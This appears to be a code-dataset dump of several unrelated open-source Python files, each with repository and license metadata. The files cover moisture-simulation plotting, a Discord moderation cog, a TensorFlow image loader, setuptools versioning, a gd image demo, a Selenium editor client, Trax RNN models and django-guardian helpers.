plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: All - Mortar: All - Insulation: None')
if save:
plt.savefig(f"{graphic_folder}/total_uninsulated_4a_moisture")
if plot == 'insulated' or plot == 'all':
plt.figure('dresdenzp_highratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True)
dresdenzp_highratio_insulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 2000)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Dresden ZP - Mortar: High Cement Ratio - Insulation: Calcium Silicate')
if save:
plt.savefig(f"{graphic_folder}/dresdenzp_highratio_insulated_4a_moisture")
plt.figure('dresdenzd_highratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True)
dresdenzd_highratio_insulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 2000)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Dresden ZD - Mortar: High Cement Ratio - Insulation: Calcium Silicate')
if save:
plt.savefig(f"{graphic_folder}/dresdenzd_highratio_insulated_4a_moisture")
plt.figure('postdam_highratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True)
postdam_highratio_insulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 2000)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Potsdam - Mortar: High Cement Ratio - Insulation: Calcium Silicate')
if save:
plt.savefig(f"{graphic_folder}/postdam_highratio_insulated_4a_moisture")
plt.figure('dresdenzp_lowratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True)
dresdenzp_lowratio_insulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 2000)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Dresden ZP - Mortar: Low Cement Ratio - Insulation: Calcium Silicate')
if save:
plt.savefig(f"{graphic_folder}/dresdenzp_lowratio_insulated_4a_moisture")
plt.figure('dresdenzd_lowratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True)
dresdenzd_lowratio_insulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 2000)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Dresden ZD - Mortar: Low Cement Ratio - Insulation: Calcium Silicate')
if save:
plt.savefig(f"{graphic_folder}/dresdenzd_lowratio_insulated_4a_moisture")
plt.figure('postdam_lowratio_insulated_4a_moisture', figsize=(16, 8), tight_layout=True)
postdam_lowratio_insulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 2000)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Potsdam - Mortar: Low Cement Ratio - Insulation: Calcium Silicate')
if save:
plt.savefig(f"{graphic_folder}/postdam_lowratio_insulated_4a_moisture")
plt.figure('total_insulated_4a_moisture', figsize=(16, 8), tight_layout=True)
total_insulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 2000)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: All - Mortar: All - Insulation: Calcium Silicate')
if save:
plt.savefig(f"{graphic_folder}/total_insulated_4a_moisture")
plt.show()
plots('all', False)
def std3_ratio(print_=False, excel=False):
"""Computes ratio of outliers in the data sets. Outliers is here defined as data points deviating with more
the 3 standard deviations from the mean."""
std3_uninsulated_ratio_ = uninsulated()
std3_insulated_ratio_ = insulated()
if print_:
print('Uninsulated')
print(std3_uninsulated_ratio_)
print('')
print('Insulated')
print(std3_insulated_ratio_)
if excel:
writer = pd.ExcelWriter(f'{out_folder}/moisture_std_ratios.xlsx')
std3_uninsulated_ratio_.to_excel(writer, 'Uninsulated')
std3_insulated_ratio_.to_excel(writer, 'Insulated')
writer.save()
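# The two functions below repeat the same computation once per data set; the
# ratio they build is equivalent to this helper (shown only for clarity, the
# script does not call it):
def outlier_ratio(df):
    """Fraction of values per column deviating more than 3 standard deviations."""
    within = df.sub(df.mean()).div(df.std()).abs().lt(3).sum()
    return (df.shape[0] - within) / df.shape[0]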
def uninsulated():
"""Computes the outliers for the uninsulated cases"""
outliers_total_uninsulated = (total_uninsulated_4a.shape[0] -
total_uninsulated_4a.sub(total_uninsulated_4a.mean())
.div(total_uninsulated_4a.std()).abs().lt(3).sum()) / total_uninsulated_4a.shape[0]
outliers_zd_high_uninsulated = (dresdenzd_highratio_uninsulated_4a.shape[0] -
dresdenzd_highratio_uninsulated_4a.sub(dresdenzd_highratio_uninsulated_4a.mean())
.div(dresdenzd_highratio_uninsulated_4a.std()).abs().lt(3).sum()) \
/ dresdenzd_highratio_uninsulated_4a.shape[0]
outliers_zp_high_uninsulated = (dresdenzp_highratio_uninsulated_4a.shape[0] -
dresdenzp_highratio_uninsulated_4a.sub(dresdenzp_highratio_uninsulated_4a.mean())
.div(dresdenzp_highratio_uninsulated_4a.std()).abs().lt(3).sum()) \
/ dresdenzp_highratio_uninsulated_4a.shape[0]
outliers_pd_high_uninsulated = (postdam_highratio_uninsulated_4a.shape[0] -
postdam_highratio_uninsulated_4a.sub(postdam_highratio_uninsulated_4a.mean())
.div(postdam_highratio_uninsulated_4a.std()).abs().lt(3).sum()) \
/ postdam_highratio_uninsulated_4a.shape[0]
outliers_zd_low_uninsulated = (dresdenzd_lowratio_uninsulated_4a.shape[0] -
dresdenzd_lowratio_uninsulated_4a.sub(dresdenzd_lowratio_uninsulated_4a.mean())
.div(dresdenzd_lowratio_uninsulated_4a.std()).abs().lt(3).sum()) \
/ dresdenzd_lowratio_uninsulated_4a.shape[0]
outliers_zp_low_uninsulated = (dresdenzp_lowratio_uninsulated_4a.shape[0] -
dresdenzp_lowratio_uninsulated_4a.sub(dresdenzp_lowratio_uninsulated_4a.mean())
.div(dresdenzp_lowratio_uninsulated_4a.std()).abs().lt(3).sum()) \
/ dresdenzp_lowratio_uninsulated_4a.shape[0]
outliers_pd_low_uninsulated = (postdam_lowratio_uninsulated_4a.shape[0] -
postdam_lowratio_uninsulated_4a.sub(postdam_lowratio_uninsulated_4a.mean())
.div(postdam_lowratio_uninsulated_4a.std()).abs().lt(3).sum()) \
/ postdam_lowratio_uninsulated_4a.shape[0]
outliers_uninsulated_ratio_ = pd.concat([outliers_total_uninsulated, outliers_zd_high_uninsulated,
outliers_zp_high_uninsulated, outliers_pd_high_uninsulated,
outliers_zd_low_uninsulated, outliers_zp_low_uninsulated,
outliers_pd_low_uninsulated], axis=1)
outliers_uninsulated_ratio_.columns = ["Brick: All - Mortar: All - Insulation: None",
"Brick: Dresden ZD - Mortar: High Cement Ratio - Insulation: None",
"Brick: Dresden ZP - Mortar: High Cement Ratio - Insulation: None",
"Brick: Potsdam - Mortar: High Cement Ratio - Insulation: None",
"Brick: Dresden ZD - Mortar: Low Cement Ratio - Insulation: None",
"Brick: Dresden ZP - Mortar: Low Cement Ratio - Insulation: None",
"Brick: Potsdam - Mortar: Low Cement Ratio - Insulation: None"]
return outliers_uninsulated_ratio_
def insulated():
"""Computes the outliers for the insulated cases"""
outliers_total_insulated = (total_insulated_4a.shape[0] - total_insulated_4a.sub(total_insulated_4a.mean())
.div(total_insulated_4a.std()).abs().lt(3).sum()) / total_insulated_4a.shape[0]
outliers_zd_high_insulated = (dresdenzd_highratio_insulated_4a.shape[0] -
dresdenzd_highratio_insulated_4a.sub(dresdenzd_highratio_insulated_4a.mean())
.div(dresdenzd_highratio_insulated_4a.std()).abs().lt(3).sum()) \
/ dresdenzd_highratio_insulated_4a.shape[0]
outliers_zp_high_insulated = (dresdenzp_highratio_insulated_4a.shape[0] -
dresdenzp_highratio_insulated_4a.sub(dresdenzp_highratio_insulated_4a.mean())
.div(dresdenzp_highratio_insulated_4a.std()).abs().lt(3).sum()) \
/ dresdenzp_highratio_insulated_4a.shape[0]
outliers_pd_high_insulated = (postdam_highratio_insulated_4a.shape[0] -
postdam_highratio_insulated_4a.sub(postdam_highratio_insulated_4a.mean())
.div(postdam_highratio_insulated_4a.std()).abs().lt(3).sum()) \
/ postdam_highratio_insulated_4a.shape[0]
outliers_zd_low_insulated = (dresdenzd_lowratio_insulated_4a.shape[0] -
dresdenzd_lowratio_insulated_4a.sub(dresdenzd_lowratio_insulated_4a.mean())
.div(dresdenzd_lowratio_insulated_4a.std()).abs().lt(3).sum()) \
/ dresdenzd_lowratio_insulated_4a.shape[0]
outliers_zp_low_insulated = (dresdenzp_lowratio_insulated_4a.shape[0] -
dresdenzp_lowratio_insulated_4a.sub(dresdenzp_lowratio_insulated_4a.mean())
.div(dresdenzp_lowratio_insulated_4a.std()).abs().lt(3).sum()) \
/ dresdenzp_lowratio_insulated_4a.shape[0]
outliers_pd_low_insulated = (postdam_lowratio_insulated_4a.shape[0] -
postdam_lowratio_insulated_4a.sub(postdam_lowratio_insulated_4a.mean())
.div(postdam_lowratio_insulated_4a.std()).abs().lt(3).sum()) \
/ postdam_lowratio_insulated_4a.shape[0]
    std3_insulated_ratio_ = pd.concat([outliers_total_insulated, outliers_zd_high_insulated,
outliers_zp_high_insulated, outliers_pd_high_insulated,
outliers_zd_low_insulated, outliers_zp_low_insulated,
outliers_pd_low_insulated], axis=1)
    std3_insulated_ratio_.columns = ["Brick: All - Mortar: All - Insulation: Calcium Silicate",
"Brick: Dresden ZD - Mortar: High Cement Ratio - Insulation: Calcium Silicate",
"Brick: Dresden ZP - Mortar: High Cement Ratio - Insulation: Calcium Silicate",
"Brick: Potsdam - Mortar: High Cement Ratio - Insulation: Calcium Silicate",
"Brick: Dresden ZD - Mortar: Low Cement Ratio - Insulation: Calcium Silicate",
"Brick: Dresden ZP - Mortar: Low Cement Ratio - Insulation: Calcium Silicate",
"Brick: Potsdam - Mortar: Low Cement Ratio - Insulation: Calcium Silicate"]
    return std3_insulated_ratio_
#std3_ratio(False, True)
|
mit
| -2,501,209,804,834,219,500
| 55.575851
| 120
| 0.600088
| false
| 3.176982
| false
| false
| false
|
MaT1g3R/YasenBaka
|
cogs/moderation.py
|
1
|
3215
|
from discord import DiscordException, Forbidden, HTTPException
from discord.ext import commands
from discord.ext.commands import Context
from bot import Yasen
from scripts.checks import has_manage_message, is_admin, no_pm
from scripts.discord_utils import leading_members
from scripts.helpers import parse_number
class Moderation:
"""
Moderation commands.
"""
__slots__ = ('bot',)
def __init__(self, bot: Yasen):
self.bot = bot
def __local_check(self, ctx: Context):
return no_pm(ctx)
@commands.command()
@commands.check(is_admin)
async def masspm(self, ctx: Context, *, args: str = None):
"""
Description: Send pm to all mentioned members.
Restriction: Cannot be used in private message.
Permission Required: Administrator
Usage: "`{prefix}masspm @mention0 @mention1 my message`"
"""
if not args:
await ctx.send(
'Please mention at least one member and include '
'a message to send.'
)
return
members, msg = leading_members(ctx, args)
if not members:
await ctx.send('Please mention at least one member.')
return
if not msg:
await ctx.send('Please enter a message for me to send.')
return
sent = []
failed = []
for m in members:
try:
await m.send(msg)
sent.append(m.display_name)
except DiscordException as e:
                self.bot.logger.warning(str(e))
failed.append(m.display_name)
success_msg = (f'PM sent to the following members:'
f'\n```\n{", ".join(sent)}\n```') if sent else ''
failed_msg = (f'Failed to send PMs to the following members:'
f'\n```\n{", ".join(failed)}\n```') if failed else ''
if success_msg or failed_msg:
await ctx.send(f'{success_msg}{failed_msg}')
@commands.command()
@commands.check(has_manage_message)
async def purge(self, ctx: Context, num=None):
"""
Description: Purge up to 99 messages in the current channel.
Restriction: |
Cannot be used in private message.
Can only purge from 1 to 99 (inclusive) messages at once.
Permission Required: Manage Messages
Usage: "`{prefix}purge num` where num is a number between 1 and 99."
"""
num = parse_number(num, int) or 0
if not 1 <= num <= 99:
await ctx.send(
'Please enter a number between 1 and 99.', delete_after=3
)
return
try:
deleted = await ctx.channel.purge(limit=num + 1)
except Forbidden:
await ctx.send('I do not have the permissions to purge messages.')
except HTTPException:
await ctx.send(':no_entry_sign: Purging messages failed.')
else:
deleted_num = len(deleted) - 1
            msg_str = (f'{deleted_num} message' if deleted_num == 1
                       else f'{deleted_num} messages')
await ctx.send(f':recycle: Purged {msg_str}.', delete_after=3)
|
apache-2.0
| -242,369,800,436,003,700
| 35.534091
| 78
| 0.565474
| false
| 4.197128
| false
| false
| false
|
ceroytres/cat_nets
|
cat_nets/datasets/read_pets.py
|
1
|
1970
|
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import tensorflow as tf
import csv
def catClassification_loader(path):
cat_names = ['Abyssinian','Bengal','Birman','Bombay','British_Shorthair',
'Egyptian_Mau','Maine_Coon','Persian','Ragdoll','Russian_Blue',
'Siamese','Sphynx']
cat_dict = dict(zip(cat_names,range(len(cat_names))))
labels_list, filename_list = [], []
with open(path,mode = 'r') as csvfile:
reader = csv.reader(csvfile, delimiter = ',')
for row in reader:
labels_list.append(cat_dict[row[0]])
filename_list.append(row[1])
labels_list = tf.convert_to_tensor(labels_list)
images_list = tf.convert_to_tensor(filename_list)
filename_queue = tf.train.slice_input_producer([labels_list,images_list], shuffle=True)
label = filename_queue[0]
filename = filename_queue[1]
raw_image = tf.read_file(filename)
image = tf.image.decode_jpeg(raw_image, channels = 3)
cat_dict = dict(zip(cat_dict.values(),cat_dict.keys()))
return image, label, cat_dict
# image = tf.image.resize_images(image,image_size,
# method = tf.image.ResizeMethod.BILINEAR,
# align_corners= True)
# image = tf.cast(image, tf.uint8)
#
# batch_size = batch_size
#
# capacity = min_after_dequeue + 3 * batch_size
#
# image_batch, label_batch = tf.train.shuffle_batch([image,label],
# batch_size = batch_size,
# capacity = capacity,
# min_after_dequeue = min_after_dequeue,
# num_threads=num_threads)
# return image_batch,label_batch
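# Minimal usage sketch (assumes TensorFlow 1.x queue runners and a CSV whose
# rows look like "<breed>,<image path>"; the path below is hypothetical):
#
# image, label, cat_dict = catClassification_loader('annotations/cats.csv')
# with tf.Session() as sess:
#     coord = tf.train.Coordinator()
#     threads = tf.train.start_queue_runners(sess=sess, coord=coord)
#     img, lbl = sess.run([image, label])
#     print(cat_dict[lbl])
#     coord.request_stop()
#     coord.join(threads)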
|
mit
| -7,524,138,306,632,480,000
| 32.561404
| 91
| 0.540102
| false
| 3.594891
| false
| false
| false
|
rwgdrummer/maskgen
|
setuptools-version/setuptools_maskgen_version.py
|
1
|
1613
|
from pkg_resources import get_distribution
from subprocess import check_output
import requests
import json
repos = 'rwgdrummer/maskgen'
giturl = 'https://api.github.com/repos'
def get_commit():
url = giturl + '/' + repos + '/pulls?state=closed'
resp = requests.get(url)
if resp.status_code == requests.codes.ok:
content = json.loads(resp.content)
for item in content:
if 'merged_at' in item and 'merge_commit_sha' in item:
return item['merge_commit_sha']
return None
def get_version():
import os
filename = 'VERSION'
#if os.path.exists('.git/ORIG_HEAD'):
# filename = '.git/ORIG_HEAD'
#else:
print os.path.abspath(filename)
with open(filename) as fp:
return fp.readline()
def validate_version_format(dist, attr, value):
try:
version = get_version().strip()
except:
version = get_distribution(dist.get_name()).version
else:
version = format_version(version=version, fmt=value)
dist.metadata.version = version
def format_version(version, fmt='{gitsha}'):
return fmt.format(gitsha=version)
if __name__ == "__main__":
# determine version from git
git_version = get_version().strip()
git_version = format_version(version=git_version)
# monkey-patch `setuptools.setup` to inject the git version
import setuptools
original_setup = setuptools.setup
def setup(version=None, *args, **kw):
return original_setup(version=git_version, *args, **kw)
setuptools.setup = setup
# import the packages's setup module
import setup
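# Hypothetical setup.py usage of the hook above (the `version_format` keyword
# name is an assumption; it must match the entry point this package registers
# for validate_version_format):
#
# setuptools.setup(
#     name='maskgen',
#     version_format='{gitsha}',
# )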
|
bsd-3-clause
| -12,361,799,161,684,228
| 27.298246
| 66
| 0.651581
| false
| 3.708046
| false
| false
| false
|
Solomoriah/gdmodule
|
demo/gddemo.py
|
1
|
1024
|
#!/usr/bin/env python
import gd, os, cStringIO, urllib2
os.environ["GDFONTPATH"] = "."
FONT = "Pacifico"
def simple():
im = gd.image((200, 200))
white = im.colorAllocate((255, 255, 255))
black = im.colorAllocate((0, 0, 0))
red = im.colorAllocate((255, 0, 0))
blue = im.colorAllocate((0, 0, 255))
im.colorTransparent(white)
im.interlace(1)
im.rectangle((0,0),(199,199),black)
im.arc((100,100),(195,175),0,360,blue)
im.fill((100,100),red)
print im.get_bounding_rect(FONT, 12.0, 0.0, (10, 100), "Hello Python")
im.string_ttf(FONT, 20.0, 0.0, (10, 100), "Hello Python", black)
f=open("xx.png","w")
im.writePng(f)
f.close()
f=open("xx.jpg", "w")
im.writeJpeg(f,100)
f.close()
f=cStringIO.StringIO()
im.writePng(f)
print "PNG size:", len(f.getvalue())
f.close()
f = urllib2.urlopen("http://www.gnu.org/graphics/gnu-head-sm.jpg")
im = gd.image(f, "jpg")
f.close()
print "GNU Image Size:", im.size()
simple()
|
bsd-3-clause
| 8,312,121,099,719,976,000
| 20.787234
| 74
| 0.583008
| false
| 2.708995
| false
| false
| false
|
quentinl-c/network_testing-client
|
app/editor.py
|
1
|
2631
|
from collaborator import Collaborator
import os
import random
import logging
import time
logging.basicConfig(filename=__name__ + '.log', level=logging.DEBUG)
logger = logging.getLogger(__name__)
HOME_DIR = os.getenv('HOME_DIR', '/home/')
WRITER_SELECTOR = 'ace_text-input'
READER_SELECTOR = 'ace_content'
FILTER = '[Tracker]'
tempo = 15  # the client waits this many seconds before collecting results
class Editor(Collaborator):
"""docstring for Editor"""
def __init__(self, controller, target, typing_speed, word_to_type):
Collaborator.__init__(self, controller, target)
logger.debug("=== Editor is being instanciated ===")
self.word_to_type = None
self.counter = 0
if len(word_to_type) > 0:
selector = WRITER_SELECTOR
self.word_to_type = word_to_type
else:
selector = READER_SELECTOR
self.word_to_type = None
self.select = None
while self.select is None:
self._driver.implicitly_wait(20)
self.select = self._driver.find_element_by_class_name(
selector)
def run(self):
self.alive = True
if self.word_to_type is not None:
beg_time = random.uniform(2.0, 6.0)
time.sleep(beg_time)
while self.alive:
if self.word_to_type is not None:
w = ''.join((self.word_to_type, ';',
str(self.counter).zfill(6)))
self.select.send_keys(w)
self.counter += 1
time.sleep(2)
else:
                # Readers just touch the editor content; the value itself is unused here.
                self.select.text
self.saveTxt()
def getResults(self):
time.sleep(tempo)
logger.debug("=== Get results from log files ===")
tmp = []
self.alive = False
time.sleep(tempo)
with open(self._log_path, 'r') as content_file:
for line in content_file:
beg = line.find(FILTER)
if beg != -1:
rec = line[beg:].split(',')[0].split('"')[0]
tmp.append(rec)
content = '\n'.join(tmp)
self._controller.sendResults(content)
def saveTxt(self):
if self.word_to_type is not None:
self.select = None
while self.select is None:
self._driver.implicitly_wait(20)
self.select = self._driver.find_element_by_class_name(
READER_SELECTOR)
content = self.select.text
        with open(HOME_DIR + str(self._controller.id) + '_content.txt', 'w') as out:
            out.write(content)
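# --- Hedged usage sketch (not part of the original file) ---
# `self._driver` is assumed to be a Selenium WebDriver supplied by the
# Collaborator base class (not shown here). A writer that types
# 'foo;000000', 'foo;000001', ... into the Ace editor could be driven as:
#
#   editor = Editor(controller, target, typing_speed=1, word_to_type='foo')
#   editor.run()         # blocking loop; getResults(), called elsewhere, clears editor.alive
#   editor.getResults()  # filters the log and sends results to the controller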
|
gpl-3.0
| 31,586,578,786,040,000
| 30.698795
| 78
| 0.54618
| false
| 3.852123
| false
| false
| false
|
google/trax
|
trax/models/rnn.py
|
1
|
9301
|
# coding=utf-8
# Copyright 2021 The Trax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""RNNs (recursive neural networks)."""
from trax import layers as tl
from trax.fastmath import numpy as jnp
def RNNLM(vocab_size,
d_model=512,
n_layers=2,
rnn_cell=tl.LSTMCell,
rnn_cell_d_state_multiplier=2,
dropout=0.1,
mode='train'):
"""Returns an RNN language model.
This model performs autoregressive language modeling:
- input: rank 2 tensor representing a batch of text strings via token IDs
plus padding markers; shape is (batch_size, sequence_length). The tensor
elements are integers in `range(vocab_size)`, and `0` values mark padding
positions.
- output: rank 3 tensor representing a batch of log-probability
distributions for each sequence position over possible token IDs;
shape is (batch_size, sequence_length, `vocab_size`).
Args:
vocab_size: Input vocabulary size -- each element of the input tensor
should be an integer in `range(vocab_size)`. These integers typically
represent token IDs from a vocabulary-based tokenizer.
d_model: Embedding depth throughout the model.
n_layers: Number of RNN layers.
rnn_cell: Type of RNN cell; must be a subclass of `Layer`.
rnn_cell_d_state_multiplier: Multiplier for feature depth of RNN cell
state.
dropout: Stochastic rate (probability) for dropping an activation value
when applying dropout.
mode: If `'predict'`, use fast inference; if `'train'` apply dropout.
Returns:
An RNN language model as a layer that maps from a tensor of tokens
to activations over a vocab set.
"""
if n_layers != 2: # TODO(jonni): Remove n_layers arg, if it can't vary?
raise ValueError(f'Number of layers must be set to 2; instead got'
f' {n_layers}.')
def MultiRNNCell():
"""Multi-layer RNN cell."""
return tl.Serial(
tl.Parallel([], tl.Split(n_items=n_layers)),
tl.SerialWithSideOutputs(
[rnn_cell(n_units=d_model) for _ in range(n_layers)]),
tl.Parallel([], tl.Concatenate(n_items=n_layers))
)
zero_state = tl.MakeZeroState( # pylint: disable=no-value-for-parameter
depth_multiplier=n_layers * rnn_cell_d_state_multiplier
)
return tl.Serial(
tl.ShiftRight(mode=mode),
tl.Embedding(vocab_size, d_model),
tl.Dropout(rate=dropout, mode=mode),
tl.Branch([], zero_state),
tl.Scan(MultiRNNCell(), axis=1, mode=mode),
tl.Select([0], n_in=2), # Drop RNN state.
tl.Dense(vocab_size),
)
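# --- Hedged usage sketch (not part of the original file) ---
# Rough shape check for RNNLM, assuming standard Trax layer semantics
# (`init` with an input signature, then a call on a batch of token IDs):
#
#   from trax import shapes
#   model = RNNLM(vocab_size=256, mode='train')
#   model.init(shapes.ShapeDtype((8, 64), dtype=jnp.int32))
#   # log_probs = model(tokens)   # tokens: int32 (8, 64) -> output (8, 64, 256)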
def GRULM(vocab_size=256,
d_model=512,
n_layers=1,
mode='train'):
"""Returns a GRU (gated recurrent unit) language model.
This model performs autoregressive language modeling:
- input: rank 2 tensor representing a batch of text strings via token IDs
plus padding markers; shape is (batch_size, sequence_length). The tensor
elements are integers in `range(vocab_size)`, and `0` values mark padding
positions.
- output: rank 3 tensor representing a batch of log-probability
distributions for each sequence position over possible token IDs;
shape is (batch_size, sequence_length, `vocab_size`).
Args:
vocab_size: Input vocabulary size -- each element of the input tensor
should be an integer in `range(vocab_size)`. These integers typically
represent token IDs from a vocabulary-based tokenizer.
d_model: Embedding depth throughout the model.
n_layers: Number of GRU layers.
mode: If `'predict'`, use fast inference (and omit the right shift).
Returns:
A GRU language model as a layer that maps from a tensor of tokens
to activations over a vocab set.
"""
return tl.Serial(
tl.ShiftRight(mode=mode),
tl.Embedding(vocab_size, d_model),
[tl.GRU(d_model, mode=mode) for _ in range(n_layers)],
tl.Dense(vocab_size),
)
# TODO(jonni): Decide names (here and Transformer): input/source, output/target
# TODO(jonni): Align with Transformer: (attention-)dropout, n-(attention-)heads
def LSTMSeq2SeqAttn(input_vocab_size=256,
target_vocab_size=256,
d_model=512,
n_encoder_layers=2,
n_decoder_layers=2,
n_attention_heads=1,
attention_dropout=0.0,
mode='train'):
"""Returns an LSTM sequence-to-sequence model with attention.
This model is an encoder-decoder that performs tokenized string-to-string
("source"-to-"target") transduction:
- inputs (2):
- source: rank 2 tensor representing a batch of text strings via token
IDs plus padding markers; shape is (batch_size, sequence_length). The
tensor elements are integers in `range(input_vocab_size)`, and `0`
values mark padding positions.
- target: rank 2 tensor representing a batch of text strings via token
IDs plus padding markers; shape is (batch_size, sequence_length). The
tensor elements are integers in `range(output_vocab_size)`, and `0`
values mark padding positions.
- output: rank 3 tensor representing a batch of log-probability
distributions for each sequence position over possible token IDs;
shape is (batch_size, sequence_length, `vocab_size`).
An example use would be to translate (tokenized) sentences from English to
German.
The model works as follows:
* Input encoder runs on the input tokens and creates activations that
are used as both keys and values in attention.
* Pre-attention decoder runs on the targets and creates
activations that are used as queries in attention.
* Attention runs on the queries, keys and values masking out input padding.
* Decoder runs on the result, followed by a cross-entropy loss.
Args:
input_vocab_size: Input vocabulary size -- each element of the input tensor
should be an integer in `range(vocab_size)`. These integers typically
represent token IDs from a vocabulary-based tokenizer.
target_vocab_size: Target vocabulary size.
d_model: Final dimension of tensors at most points in the model, including
the initial embedding output.
n_encoder_layers: Number of LSTM layers in the encoder.
n_decoder_layers: Number of LSTM layers in the decoder after attention.
n_attention_heads: Number of attention heads.
attention_dropout: Stochastic rate (probability) for dropping an activation
value when applying dropout within an attention block.
mode: If `'predict'`, use fast inference. If `'train'`, each attention block
will include dropout; else, it will pass all values through unaltered.
Returns:
An LSTM sequence-to-sequence model as a layer that maps from a
source-target tokenized text pair to activations over a vocab set.
"""
input_encoder = tl.Serial(
tl.Embedding(input_vocab_size, d_model),
[tl.LSTM(d_model) for _ in range(n_encoder_layers)],
)
pre_attention_decoder = tl.Serial(
tl.ShiftRight(mode=mode),
tl.Embedding(target_vocab_size, d_model),
tl.LSTM(d_model, mode=mode),
)
def PrepareAttentionInputs():
"""Layer that prepares queries, keys, values and mask for attention."""
def F(encoder_activations, decoder_activations, input_tokens):
keys = values = encoder_activations
queries = decoder_activations
# Mask is 1 where inputs are not padding (0) and 0 where they are padding.
mask = (input_tokens != 0)
# We need to add axes to the mask for attention heads and decoder length.
mask = jnp.reshape(mask, (mask.shape[0], 1, 1, mask.shape[1]))
# Broadcast so mask is [batch, 1 for heads, decoder-len, encoder-len].
mask = mask + jnp.zeros((1, 1, decoder_activations.shape[1], 1))
mask = mask.astype(jnp.float32)
return queries, keys, values, mask
return tl.Fn('PrepareAttentionInputs', F, n_out=4)
return tl.Serial( # in-toks, target-toks
tl.Select([0, 1, 0, 1]), # in-toks, target-toks, in-toks, target-toks
tl.Parallel(input_encoder, pre_attention_decoder),
PrepareAttentionInputs(), # q, k, v, mask, target-toks
tl.Residual(
tl.AttentionQKV(d_model, n_heads=n_attention_heads,
dropout=attention_dropout, mode=mode,
cache_KV_in_predict=True)
), # decoder-vecs, mask, target-toks
tl.Select([0, 2]), # decoder-vecs, target-toks
[tl.LSTM(d_model, mode=mode) for _ in range(n_decoder_layers)],
tl.Dense(target_vocab_size),
tl.LogSoftmax()
)
|
apache-2.0
| -1,051,844,559,480,561,700
| 39.973568
| 80
| 0.669498
| false
| 3.956189
| false
| false
| false
|
textcad/pyMagpie
|
magpie/motor.py
|
1
|
2154
|
#!/usr/bin/env python
from textcad import *
import magpie.utility
import magpie.hardware
class Stepper(component.Element):
def __init__(self,
size="GenericNEMA17",
negative=False,
negativeLength=10):
component.Element.__init__(self, name="stepper")
self.size = size
self.width = 0
self.length = 0
self.mountSpacing = 0
self.mountScrew = ""
self.flangeDiameter = 0
self.flangeHeight = 0
self.shaftLength = 0
self.shaftDiameter = 0
self.negative = negative
self.negativeLength = negativeLength
magpie.utility.get_dimensions(size=size, name="stepperMotor", obj=self)
self.holeLocations = [[self.mountSpacing/2, self.mountSpacing/2, 0],
[self.mountSpacing/2, -self.mountSpacing/2, 0],
[-self.mountSpacing/2, self.mountSpacing/2, 0],
[-self.mountSpacing/2, -self.mountSpacing/2, 0]]
self.screw = magpie.hardware.CapScrew(size=self.mountScrew)
self.location = [0, 0, 0]
self.color = [0.5, 0.5, 0.5]
self.construction = self._construction()
def _construction(self):
body = element.Cube([self.width, self.width, self.length])
body.center = [True, True, False]
body.location = [0, 0, -self.length]
flange = element.Cylinder(radius=self.flangeDiameter/2,
height=self.flangeHeight)
shaft = element.Cylinder(radius=self.shaftDiameter/2,
height=self.shaftLength+self.flangeHeight)
asm = body + flange + shaft
if self.negative:
# Flange
asm += element.Hole(radius=self.flangeDiameter/2,
height=self.negativeLength)
# Mount holes
for hole in self.holeLocations:
s = element.Hole(radius=self.screw.outerDiameter/2,
height=self.negativeLength)
s.location = hole
asm += s
return asm
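# --- Hedged usage sketch (not part of the original file) ---
# Assuming the textcad element API used above, the `negative` form of the
# motor (flange pocket plus the four mount holes) is meant to be subtracted
# from an enclosing part; the subtraction operator itself is assumed here:
#
#   motor = Stepper(size="GenericNEMA17", negative=True, negativeLength=8)
#   # bracket = bracket_body - motor.construction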
|
mit
| -7,378,518,400,631,267,000
| 38.888889
| 79
| 0.551532
| false
| 3.930657
| false
| false
| false
|
restless/django-guardian
|
guardian/utils.py
|
1
|
4832
|
"""
django-guardian helper functions.
Functions defined within this module should be considered as django-guardian's
internal functionality. They are **not** guaranteed to be stable - which means
they actual input parameters/output type may change in future releases.
"""
import os
import logging
from itertools import chain
from django.conf import settings
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.core.exceptions import PermissionDenied
from django.http import HttpResponseForbidden, HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext, TemplateDoesNotExist
from django.utils.http import urlquote
from guardian.compat import AnonymousUser
from guardian.compat import Group
from guardian.compat import User
from guardian.conf import settings as guardian_settings
from guardian.exceptions import NotUserNorGroup
logger = logging.getLogger(__name__)
abspath = lambda *p: os.path.abspath(os.path.join(*p))
def get_anonymous_user():
"""
Returns ``User`` instance (not ``AnonymousUser``) depending on
``ANONYMOUS_USER_ID`` configuration.
"""
return User.objects.get(id=guardian_settings.ANONYMOUS_USER_ID)
def get_groups_backref_name():
"""
Returns backreference name from Group to user model.
"""
